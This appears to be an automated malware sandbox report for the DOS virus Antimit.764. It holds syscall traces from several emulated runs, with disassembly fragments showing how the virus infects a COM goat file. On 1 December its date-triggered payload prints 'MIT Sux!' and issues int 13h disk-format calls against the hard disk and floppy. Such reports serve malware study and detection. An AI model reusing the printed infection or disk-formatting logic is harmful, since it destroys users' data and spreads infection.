Sample viewer

vx.netlux.org/Virus.DOS.Antimit.764

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:11:22.787501195Z 25 PC: 12a59 | Get default drive
2018-12-17T23:11:22.789253359Z 14 PC: 12a5f | Set default drive (Drive = 'Õ')
2018-12-17T23:11:22.790277278Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-17T23:11:22.791952434Z 53 PC: 12ad1 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:11:22.793932828Z 37 PC: 12ae2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:11:22.795056659Z 26 PC: 12aef | Set disk transfer address
2018-12-17T23:11:22.796150478Z 78 PC: 12af9 | Find first file
2018-12-17T23:11:22.80277743Z 79 PC: 12b1e | Find next file
2018-12-17T23:11:22.805939118Z 79 PC: 12b1e | Find next file
2018-12-17T23:11:22.809067311Z 79 PC: 12b1e | Find next file
2018-12-17T23:11:22.812345292Z 79 PC: 12b1e | Find next file
2018-12-17T23:11:22.816617728Z 79 PC: 12b1e | Find next file
2018-12-17T23:11:22.819674838Z 67 PC: 12b45 | Get or set file attributes
2018-12-17T23:11:22.826228667Z 67 PC: 12b4f | Get or set file attributes
2018-12-17T23:11:22.844902617Z 61 PC: 12b54 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:11:22.85221404Z 87 PC: 12b5d | Get or set file date and time
2018-12-17T23:11:22.853632941Z 63 PC: 12b6f | Read file or device (Read 474 bytes on handle 5)
2018-12-17T23:11:22.861481019Z 66 PC: 12b80 | Move file pointer
2018-12-17T23:11:22.863109252Z 64 PC: 12b91 | Write file or device (Write 290 bytes on handle 5)
2018-12-17T23:11:22.871840981Z 64 PC: 12ba2 | Write file or device (Write 474 bytes on handle 5)
2018-12-17T23:11:22.881445965Z 66 PC: 12bb3 | Move file pointer
2018-12-17T23:11:22.883415135Z 44 PC: 12bb9 | Get time 0x12bb9: mov byte ptr [0x105], dh
0x12bbd: call 0x22a46
0x12bc0: mov ah, 0x40
0x12bc2: mov dx, 0x100
0x12bc5: mov cx, 0x1da
0x12bc8: int 0x21
0x12bca: jb 0x12c0d
0x12bcc: cmp ax, 0x1da
0x12bcf: jne 0x12c0d
0x12bd1: jmp 0x12bde
0x12bd3: mov al, 0
0x12bd5: iret
0x12bd6: sub byte ptr [di + 0x4d88], cl
0x12bda: push bp
0x12bdb: add word ptr [bx + 0x11], dx
0x12bde: mov ax, 0x5701
0x12be1: mov cx, word ptr [0x296]
0x12be5: mov dx, word ptr [0x298]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x1f
2018-12-17T23:11:22.886307632Z 25 PC: 12a59 | Get default drive
2018-12-17T23:11:22.889607802Z 14 PC: 12a5f | Set default drive (Drive = 'Š')
2018-12-17T23:11:22.891010809Z 64 PC: 12bca | Write file or device (Write 474 bytes on handle 5)
2018-12-17T23:11:22.898603928Z 87 PC: 12bf1 | Get or set file date and time
2018-12-17T23:11:22.900594524Z 62 PC: 12bf5 | Close file
2018-12-17T23:11:22.910271245Z 26 PC: 12bfc | Set disk transfer address
2018-12-17T23:11:22.911503018Z 37 PC: 12c0c | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:11:22.9130329Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-17T23:11:22.919909697Z 48 PC: 12a8f | Get DOS version
2018-12-17T23:11:22.92162981Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-17T23:11:22.93020997Z 93 PC: 12afe | File sharing functions
2018-12-17T23:11:22.933646506Z 9 PC: 12a86 | Display string (String= 'Size change=02FCh/00764d. ')
2018-12-17T23:11:22.938746538Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17168,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:05.68336702Z 25 PC: 12a59 | Get default drive
2018-12-25T12:55:05.685437002Z 14 PC: 12a5f | Set default drive (Drive = 'Õ')
2018-12-25T12:55:05.687230599Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-25T12:55:05.690035959Z 53 PC: 12ad1 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:55:05.692795405Z 37 PC: 12ae2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:55:05.694634385Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:55:05.696235943Z 78 PC: 12af9 | Find first file
2018-12-25T12:55:05.703092723Z 79 PC: 12b1e | Find next file
2018-12-25T12:55:05.706236325Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:05.709158081Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:05.712021743Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:05.715889656Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:05.718838012Z 67 PC: 12b45 | Get or set file attributes
2018-12-25T12:55:05.725374999Z 67 PC: 12b4f | Get or set file attributes
2018-12-25T12:55:05.74321212Z 61 PC: 12b54 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:55:05.759905002Z 87 PC: 12b5d | Get or set file date and time
2018-12-25T12:55:05.761702277Z 63 PC: 12b6f | Read file or device (Read 474 bytes on handle 5)
2018-12-25T12:55:05.771732998Z 66 PC: 12b80 | Move file pointer
2018-12-25T12:55:05.772991435Z 64 PC: 12b91 | Write file or device (Write 290 bytes on handle 5)
2018-12-25T12:55:05.779908213Z 64 PC: 12ba2 | Write file or device (Write 474 bytes on handle 5)
2018-12-25T12:55:05.786993573Z 66 PC: 12bb3 | Move file pointer
2018-12-25T12:55:05.788213234Z 44 PC: 12bb9 | Get time 0x12bb9: mov byte ptr [0x105], dh
0x12bbd: call 0x22a46
0x12bc0: mov ah, 0x40
0x12bc2: mov dx, 0x100
0x12bc5: mov cx, 0x1da
0x12bc8: int 0x21
0x12bca: jb 0x12c0d
0x12bcc: cmp ax, 0x1da
0x12bcf: jne 0x12c0d
0x12bd1: jmp 0x12bde
0x12bd3: mov al, 0
0x12bd5: iret
0x12bd6: sub byte ptr [di + 0x4d88], cl
0x12bda: push bp
0x12bdb: add word ptr [bx + 0x11], dx
0x12bde: mov ax, 0x5701
0x12be1: mov cx, word ptr [0x296]
0x12be5: mov dx, word ptr [0x298]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x1f
2018-12-25T12:55:05.789970802Z 25 PC: 12a59 | Get default drive (See above)
2018-12-25T12:55:05.792545426Z 14 PC: 12a5f | Set default drive (See above)
2018-12-25T12:55:05.793754978Z 64 PC: 12bca | Write file or device (Write 474 bytes on handle 5)
2018-12-25T12:55:05.799956299Z 87 PC: 12bf1 | Get or set file date and time
2018-12-25T12:55:05.802462316Z 62 PC: 12bf5 | Close file
2018-12-25T12:55:05.812672911Z 26 PC: 12bfc | Set disk transfer address
2018-12-25T12:55:05.814393929Z 37 PC: 12c0c | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:55:05.816337277Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:55:05.824102146Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:55:05.825937657Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:55:05.833755773Z 93 PC: 12afe | File sharing functions
2018-12-25T12:55:05.837383112Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:55:05.8423472Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17168,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:05.885444277Z 25 PC: 12a59 | Get default drive
2018-12-25T12:55:05.888895856Z 14 PC: 12a5f | Set default drive (Drive = 'Õ')
2018-12-25T12:55:05.890766455Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-25T12:55:05.896148795Z 9 PC: 12aa5 | Display string (String= 'MIT Sux! ')
2018-12-25T12:55:05.902359332Z 76 PC: 12abf | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":2,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17168,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:06.322028403Z 25 PC: 12a59 | Get default drive
2018-12-25T12:55:06.324612305Z 14 PC: 12a5f | Set default drive (Drive = 'Õ')
2018-12-25T12:55:06.326383549Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-25T12:55:06.329342677Z 53 PC: 12ad1 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:55:06.33209844Z 37 PC: 12ae2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:55:06.333749623Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:55:06.335367274Z 78 PC: 12af9 | Find first file
2018-12-25T12:55:06.342927442Z 79 PC: 12b1e | Find next file
2018-12-25T12:55:06.346293884Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:06.349685333Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:06.353831035Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:06.357133734Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:55:06.360315197Z 67 PC: 12b45 | Get or set file attributes
2018-12-25T12:55:06.366977517Z 67 PC: 12b4f | Get or set file attributes
2018-12-25T12:55:06.386947417Z 61 PC: 12b54 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:55:06.394431122Z 87 PC: 12b5d | Get or set file date and time
2018-12-25T12:55:06.395800971Z 63 PC: 12b6f | Read file or device (Read 474 bytes on handle 5)
2018-12-25T12:55:06.401384635Z 66 PC: 12b80 | Move file pointer
2018-12-25T12:55:06.402576904Z 64 PC: 12b91 | Write file or device (Write 290 bytes on handle 5)
2018-12-25T12:55:06.407854246Z 64 PC: 12ba2 | Write file or device (Write 474 bytes on handle 5)
2018-12-25T12:55:06.413837725Z 66 PC: 12bb3 | Move file pointer
2018-12-25T12:55:06.415072743Z 44 PC: 12bb9 | Get time 0x12bb9: mov byte ptr [0x105], dh
0x12bbd: call 0x22a46
0x12bc0: mov ah, 0x40
0x12bc2: mov dx, 0x100
0x12bc5: mov cx, 0x1da
0x12bc8: int 0x21
0x12bca: jb 0x12c0d
0x12bcc: cmp ax, 0x1da
0x12bcf: jne 0x12c0d
0x12bd1: jmp 0x12bde
0x12bd3: mov al, 0
0x12bd5: iret
0x12bd6: sub byte ptr [di + 0x4d88], cl
0x12bda: push bp
0x12bdb: add word ptr [bx + 0x11], dx
0x12bde: mov ax, 0x5701
0x12be1: mov cx, word ptr [0x296]
0x12be5: mov dx, word ptr [0x298]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x1f
2018-12-25T12:55:06.416843362Z 25 PC: 12a59 | Get default drive (See above)
2018-12-25T12:55:06.418247116Z 14 PC: 12a5f | Set default drive (See above)
2018-12-25T12:55:06.420512701Z 64 PC: 12bca | Write file or device (Write 474 bytes on handle 5)
2018-12-25T12:55:06.428352039Z 87 PC: 12bf1 | Get or set file date and time
2018-12-25T12:55:06.434151585Z 62 PC: 12bf5 | Close file
2018-12-25T12:55:06.443148462Z 26 PC: 12bfc | Set disk transfer address
2018-12-25T12:55:06.444788352Z 37 PC: 12c0c | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:55:06.446957806Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:55:06.45520005Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:55:06.456931711Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:55:06.46458528Z 93 PC: 12afe | File sharing functions
2018-12-25T12:55:06.467849776Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:55:06.47258622Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')